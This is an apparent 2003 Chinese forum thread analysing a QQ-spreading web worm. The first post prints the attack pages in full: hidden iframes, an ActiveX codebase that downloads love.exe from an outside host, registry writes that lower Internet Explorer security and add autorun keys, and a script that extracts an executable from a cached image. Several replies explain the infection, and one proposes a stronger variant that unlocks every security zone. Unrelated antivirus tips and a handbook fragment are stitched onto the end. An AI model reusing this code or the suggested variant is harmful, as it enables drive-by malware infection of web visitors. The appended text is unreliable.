分析一下这个病毒(不要轻易打开其中的网址)

griefforyou 2003-09-18 11:24:47
今天QQ群乱套了,有人发消息

http://nicex.126.com
看看啊. 我最近照的照片~ 才扫描到网上的.看看我是不是变了样?

我点了链接,不一会,我的QQ也向QQ群中发这条消息,我知道我中毒了。。。。

QQ群中很多人都中了毒。。。。。。。。。

我分析了一下,终于找到病根,请大家分析一下

网页中包含以下两行
<iframe src="1.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="2.htm" width="0" height="0" frameborder="0"></iframe>


其中1.htm内容如下
<HTML>

<HEAD>

<TITLE>aaa</TITLE>

</HEAD>

<BODY>


<OBJECT
classid="clsid:36CB6B28-FC08-4373-8F54-1A02E3C15B7D" codebase="http://yy20.nease.net/zcyh/images/WebDownLoadProj1.ocx#version=1,0,0,0"
width=1 height=1 align=center
hspace=0 vspace=0>

<param name="StrUrl" value="http://yy20.nease.net/zcyh/love.exe">
</OBJECT>
<iframe src="love.mht" width="0" height="0" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no">
</iframe>
</BODY></HTML>

其中又包含了love.mht,这是一个编码后的邮件,其中包含一个可执行文件
Content-Type: audio/x-wav;
name="jieba.exe"
Content-Transfer-Encoding: base64
Content-ID: <Mud>

由于这个文件太大,无法在此帖出

2.htm
<SCRIPT>

document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");

function f(){

try
{

//ActiveX initialization
a1=document.applets[0];

a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");

a1.createInstance();

Shl = a1.GetObject();

a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");

a1.createInstance();

FSO = a1.GetObject();

a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");

a1.createInstance();
Net = a1.GetObject();

try
{

if (document.cookie.indexOf("Chg") == -1)
{

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1004",0,"REG_DWORD");

var expdate = new Date((new Date()).getTime() + (1));

document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}

catch(e)
{}
}
catch(e)
{}
}


function init()
{
setTimeout("f()", 1000);
}

init();
</SCRIPT>


<script language="javascript">

<!-- Begin

function opencolortext(){

window.open('3.htm','colortext','top=9999,left=9999,width=0,height=0')
}

setTimeout("opencolortext()",2000)

// End -->

</script>

其中打开了3.htm,其内容为
<HTML>
<HEAD>
<TITLE>网易广告</TITLE>
</HEAD>
<BODY>
<meta http-equiv=Content-Type content="text/html; charset=gb2312">
<SCRIPT language=javascript>
run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""

run_exe+="CODEBASE=\"love.exe#version=1,1,1,1\">"

run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">"

run_exe+="</OBJECT>"

run_exe+="<HTML><H1> </H1></HTML>";

document.open();

document.clear();

document.writeln(run_exe);

document.close();
</SCRIPT>




<IMG SRC=Server.bmp width=0 height=0>

<SCRIPT SRC=Server.js></SCRIPT>

</BODY></HTML>

其中包括的Server.js内容如下
document.write('<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>');
function docsave()
{
a=document.applets[0];
a.setCLSID('{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}');
a.createInstance();
wsh=a.GetObject();
a.setCLSID('{0D43FE01-F093-11CF-8940-00A0C9054228}');
a.createInstance();
fso=a.GetObject();
var winsys=fso.GetSpecialFolder(1);
var vbs=winsys+'\\s.vbs';
wsh.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\vbs','wscript '+'"'+vbs+'"');
wsh.RegWrite('HKCR\\.VBS\\','VBSFile');
var st=fso.CreateTextFile(vbs,true);
st.WriteLine('Option Explicit');
st.WriteLine('Dim FSO,WSH,CACHE,str');
st.WriteLine('Set FSO = CreateObject("Scripting.FileSystemObject")');
st.WriteLine('Set WSH = CreateObject("WScript.Shell")');
st.WriteLine('CACHE=wsh.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Cache")');
st.WriteLine('wsh.RegDelete("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\vbs")');
st.WriteLine('wsh.RegWrite "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\tmp","tmp.exe"');
st.WriteLine('SearchBMPFile fso.GetFolder(CACHE),"Server[1].bmp"');
st.WriteLine('WScript.Quit()');
st.WriteLine('Function SearchBMPFile(Folder,fname)');
st.WriteLine(' Dim SubFolder,File,Lt,tmp,winsys');
st.WriteLine(' str=FSO.GetParentFolderName(folder) & "\\" & folder.name & "\\" & fname');
st.WriteLine(' if FSO.FileExists(str) then');
st.WriteLine(' tmp=fso.GetSpecialFolder(2) & "\\"');
st.WriteLine(' winsys=fso.GetSpecialFolder(1) & "\\"');
st.WriteLine(' set File=FSO.GetFile(str)');
st.WriteLine(' File.Copy(tmp & "tmp.dat")');
st.WriteLine(' File.Delete');
st.WriteLine(' set Lt=FSO.CreateTextFile(tmp & "tmp.in")');
st.WriteLine(' Lt.WriteLine("rbx")');
st.WriteLine(' Lt.WriteLine("3")');
st.WriteLine(' Lt.WriteLine("rcx")');
st.WriteLine(' Lt.WriteLine("5492")');
st.WriteLine(' Lt.WriteLine("w136")');
st.WriteLine(' Lt.WriteLine("q")');
st.WriteLine(' Lt.Close');
st.WriteLine(' WSH.Run "command /c debug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out",false,6');
st.WriteLine(' On Error Resume Next ');
st.WriteLine(' FSO.GetFile(tmp & "tmp.dat").Copy(winsys & "tmp.exe")');
st.WriteLine(' FSO.GetFile(tmp & "tmp.dat").Delete');
st.WriteLine(' FSO.GetFile(tmp & "tmp.in").Delete');
st.WriteLine(' FSO.GetFile(tmp & "tmp.out").Delete');
st.WriteLine(' end if');
st.WriteLine(' If Folder.SubFolders.Count <> 0 Then');
st.WriteLine(' For Each SubFolder In Folder.SubFolders');
st.WriteLine(' SearchBMPFile SubFolder,fname');
st.WriteLine(' Next');
st.WriteLine(' End If');
st.WriteLine('End Function');
st.Close();
}
setTimeout('docsave()',1000);





我晕了。。。。。。。。。。。。。这病毒牛,谁能解开其中奥秘?

...全文
60 14 打赏 收藏 转发到动态 举报
写回复
用AI写文章
14 条回复
切换为时间正序
请发表友善的回复…
发表回复
griefforyou 2003-09-19
  • 打赏
  • 举报
回复
打开网页后,病毒自动将邮件中的可执行文件生成在C:\windows\temp下

并生成副本
C:\WINDOWS\intrenat.exe
C:\Windows\system\DirectX.exe
c:\windows\system\winhelp.exe
c:\windows\system\winhelp32.exe

在system.ini中[boot]项写入
shell=Explorer.exe C:\Windows\system\DirectX.exe (本应该只用Explorer.exe的)

在注册表
HKEY_Local_Machine\......\run\下写入 自动运行 C:\WINDOWS\intrenat.exe和C:\WINDOWS\winhelp.exe

在注册表
HKEY_LOCAL_Machine\...\runservice\下写入自动运行 C:\WINDOWS\intrenat.exe

在win.ini中[windows]项写入
run=C:\WINDOWS\winhelp32.exe




griefforyou 2003-09-19
  • 打赏
  • 举报
回复
没点同意,安全设置是默认的
griefforyou 2003-09-19
  • 打赏
  • 举报
回复
是呀,这里面有病毒代码呀,不过放心,只是文本形式
wind0209 2003-09-19
  • 打赏
  • 举报
回复
晕倒,我打开这个xml文件,NORTON报病毒了.......
griefforyou 2003-09-19
  • 打赏
  • 举报
回复
不是吧。。。
主要问题在于 love.mht上,当love.mht在iframe中打开时,自动会将其中附件jiede.exe下载到临时目录然后运行,运行以后病毒将生成几个副本,并修改注册表和System.ini Win.ini来自动启动它们
xdspower 2003-09-19
  • 打赏
  • 举报
回复
主要是利用了ms的脚本对象控制,
griefforyou 2003-09-19
  • 打赏
  • 举报
回复
这个Love.mht原来是“狩猎者”病毒........
请看:http://www.duba.net/download/3/34.shtml

问题好像有点复杂。。。。。这不只是一个病毒吧?
griefforyou 2003-09-19
  • 打赏
  • 举报
回复
谁能完整说一下病毒的原理
blues-star 2003-09-19
  • 打赏
  • 举报
回复
修改的是

下载未签名的 ACTIVEX 控件
值0代表启用
值1代表提示
值3代表禁用

(手工修改一下,再打开注册表看看值的变化就知道了)

从上面一段可以看出它是将该项目启用了。

写这个的人真傻,要是我

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\1004",0,"REG_DWORD");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\1004",0,"REG_DWORD");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\1004",0,"REG_DWORD");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1004",0,"REG_DWORD");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\1004",0,"REG_DWORD");

这样就把所有区域的都设成启用了,这样看拖进黑名单会有点用,因为黑名单里的网站javascript都是不允许执行的,也修改不了了。
zhzhkun 2003-09-19
  • 打赏
  • 举报
回复
http://bbs.kingsoft.net/index.php?act=ST&f=20&t=235766&s=9ff50226de60b8103e8d5cfac8017db4
去这里下载专杀,我试了,可以杀死
blues-star 2003-09-19
  • 打赏
  • 举报
回复
1、利用IE漏洞,修改注册表,更改IE安全设置,自动下载ACTIVEX组件启用;
2、通过<object>的codebase下载木马或病毒程序;
3、用木马或病毒程序完成制造者的意图。

给IE打补丁,不让修改安全设置就可以了,IE的安全设置是浏览者的大门,要把好门。
通常不是很强的人写出来的更改安全设置应该是IE默认的安全设置,IE的安全设置里有信任站点和不信任站点,遇到这样的网站直接啦他去黑名单就行了,不过最根本的还是要靠打补丁。

http://www.muchina.com.cn/这个网站也是用类似手段将木马种到浏览者机器里,然后窃取游戏帐号的。

(这段程序是可以修改安全设置的,所以根本不会弹出提示,直接下载ACTIVEX,不知道的人可能以为什么也没有发生呢)

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1004",0,"REG_DWORD");

这句
zhzhkun 2003-09-19
  • 打赏
  • 举报
回复
晕,只要打开页面,QQ就被感染了。特征是只要打开一个“收发讯息”等几秒就会发送楼主所遇到的情况,解决方法:到金山毒霸搞一个“QQ ICQ安全助手”嵌入就行了!
Jaron 2003-09-18
  • 打赏
  • 举报
回复
不要随意同意ActiveX运行。
特别是那些没有经过知名数字签名机构验证的数字签名的ActiveX程序
ShiningstarHu 2003-09-18
  • 打赏
  • 举报
回复
把这些code 发给 www.iduba.net让他们分析去把,自己有时间多看看别的!

1、重要资料,必须备份。资料是最重要的,程序损坏了可重新COPY,甚至再买一份,但是自己键入的资料,可能是三年的会计资料,可能是画了三个月的图片,结果某一天,硬盘坏了或者(计算机基础知识http://www.woaidiannao.com)因为病毒而损坏了资料,会让人欲哭无泪,所以对于重要资料经常备份是绝对必要的。  2、备好启动软盘,并贴上写保护。检查电脑的任何问题,或者是解毒,最好在没有病毒干扰的环境下进行,才能完整测出真正的原因,或是彻底解决病毒的侵入。因此,在安装系统之后,应该及时做一张启动盘,以备不时之需。 3、尽量避免在无防毒软件的机器上使用软盘/zip盘/mo等可移动储存介质。一般人都以为不要使用别人的磁盘,即可防毒,但是不要随便用别人的电脑也是非常重要的,否则有可能带一大堆病毒回家。  4、准备一份具有查毒、防毒、解毒及重要功能的软件,将有助于杜绝病毒。 5、使用新软件时,先用扫毒程序检查,可减少中毒机会。主动检查,可以过滤大部份的病毒。 6、不要在互联网上随意下载软件。病毒的一大传播途径,就是Internet。潜伏在网络上的各种可下载程序中,如果你随意下载、随意打开,对于制造病毒者来说,可真是再好不过了。因此,不要贪图免费软件,如果实在需要,请在下载后执行杀毒、查毒软件彻底检查。 7、不要轻易打开电子邮件的附件。近年来造成大规模破坏的许多病毒,都是通过电子邮件传播的。不要以为只打开熟人发送的附件就一定保险,有的病毒会自动检查受害人电脑上的通讯录并向其中的所有地址自动发送带毒文件。最妥当的做法,是先将附件保存下来,不要打开,先用查毒软件彻底检查。 8、若硬盘资料已遭到破坏,不必急着FORMAT,因病毒不可能在短时间内,将全部硬盘资料破坏,故可利用灾后重建的解毒程序,加以分析,重建受损状态。重建硬盘是有可能的,救回的机率相当高。
网络安全手册全文共6页,当前为第1页。网络安全手册 网络安全手册全文共6页,当前为第1页。 目录 一、10条上网安全常识,安全上网。 二、如何养成安全的上网习惯 1、使用安全的电 2、使用安全的软件 3.访问安全的网站 4、交流中注意保护隐私 5、遵守国家法律法规 6、青少年上网安全指引 三、手机上网也要注意。 网络安全手册全文共6页,当前为第2页。 网络安全手册全文共6页,当前为第2页。 一、10条上网安全常识,安全上网。 网络高速发展的今天,网络安全成了一个很大的问题,不仅众多企业深受其害,我 们平常的老百姓也是被他折腾的痛不欲生,整天上网提心吊胆。数据的窃取,个人私密 的泄露,病毒对我们电脑和文件的危害等等。为解救我们的菜鸟,下面列举了十个简单 的上网安全常识。 重装系统连接网络前,必须确保windows防火墙是开启状态,建议立即修改 administrator用户口令,这一步其实在安装的时候就要做,不过有很多人会使用空口 令。修改方法:修改方法,右键单击我的电脑,选择管理,浏览到本地用户和组,在 右边的窗格中,选择具备管理员权限的用户名,单击右键,选择设置密码,输入新密码。 安全的密码是字母数字特殊字符的组合。 强烈建议改变你的操作习惯,不要使用双击方式来打开本地磁盘、移动硬盘.U 盘.各种数码存储卡。而要习惯使用在磁盘图标上点右键,在弹出的菜单中选择资源管 理器。在进行下一步之前,强烈建议不要插入各种移动存储设备。 立即关闭自动播放功能,自动播放大大增加了感染病毒的风险,熊猫烧香病毒 很多是通过插入U盘这样一个简单的动作入侵系统的。关闭方法:步骤:单击开始, 运行,输入gpedit.msc,打开组策略编辑器,浏览到计算机配置,管理模板,系统, 在右边的窗格中选择关闭自动播放,该配置缺省是未配置,在下拉框中选择所有驱动器, 再选取已启用,确定后关闭。最后,在开始,运行中输入gpupdate,确定后,该策略 就生效了。 4>重要资料,必须备份。资料是最重要的,程序损坏了可重新COPY,甚至再买 一份,但是自己键入的资料,可能是三年的会计资料,可能是画了三个月的图片,结果 某一天,硬盘坏了或者因为病毒而损坏了资料,会让人欲哭无泪,所以对于重要资料经 常备份是绝对必要的。 5、 尽量避免在无防毒软件的机器上使用软盘/zip盘/m。等可移动储存介质o 一般 人都以为不要使用别人的磁盘,即可防毒,但是不要随便用别人的电脑也是非常重要的, 否则有可能带一大堆病毒回家。 6、 使用新软件时,先用扫毒程序检査,可减少中毒机会。主动检査,可以过滤大 部份的病毒。 7、 准备一份具有査毒.防毒、解毒及重要功能的软件,将有助于杜绝病毒。 8、 若硬盘资料已遭到破坏,不必急着FORMAT,因病毒不可能在短时间内,将全部 硬盘资料破坏,故可利用灾后重建的解毒程序,加以分析,重建受损状态。重建硬盘 是有可能的,救回的机率相当高。 9、 不要在互联网上随意下载软件。病毒的一大传播途径,就是Internet.潜伏 在网络上的各种可下载程序中,如果你随意下载.随意打开,对于制造病毒者来说,可 真是再好不过了。因此,不要贪图免费软件,如果实在需要,请在下载后执行杀毒、査 毒软件彻底检査。 网络安全手册全文共6页,当前为第3页。10、 不要轻易打开电子邮件的附件。近年來造成大规模破坏的许多病毒,都是通 过电子邮件传播的。不要以为只打开熟人发送的附件就一定保险,有的病毒会自动检査 受害人电脑上的通讯录并向其中的所有地址自动发送带毒文件。最妥当的做法,是先将 附件保存下来,不要打开,先用査毒软件彻底检査。 网络安全手册全文共6页,当前为第3页。 二、如何养成安全的上网习惯 互联网的多元化与复杂化在给我们的生活带来丰富和便利的同时,也可能会带来危 害,那么安全上网便不可忽视,如何安全上网呢?下面我们一起来了解如何安全上网, 保障自己的个人信息安全,减少损失。 h使用安全的电脑 〈个人电脑〉 探设置操作系统登录密码,并开启系统防火墙。 探安装杀毒软件并及时更新病毒特征库。 探尽量不转借个人电脑。 〈公共电脑〉 探不在未安装杀毒软件的电脑上登录个人帐户。 探尽量不在公共电脑登录网络银行等敏感帐户。 探不在公共电脑保存个人资料和帐号信息。 探尽量使用软键盘输入密码。 探离开前注意退出所有已登录的帐户。 2、 使用安全的软件 探只使用正版软件。 探开启操作系统及其他软件的自动更新设置,及时修复系统漏洞和第三方软件漏 洞。 探非正规渠道获取的软件在运行前须进行病毒扫描。 探定期全盘扫描病毒等可疑程序。 探定期清理未知可疑插件和临时文件。 3、 访问安全的网站 探尽量访问正规的大型网站。 探不访问包含黄色、暴力等不良信息的网站。 探对于网站意外弹出的下载文件或安装插件等请求

87,910

社区成员

发帖
与我相关
我的任务
社区描述
Web 开发 JavaScript
社区管理员
  • JavaScript
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧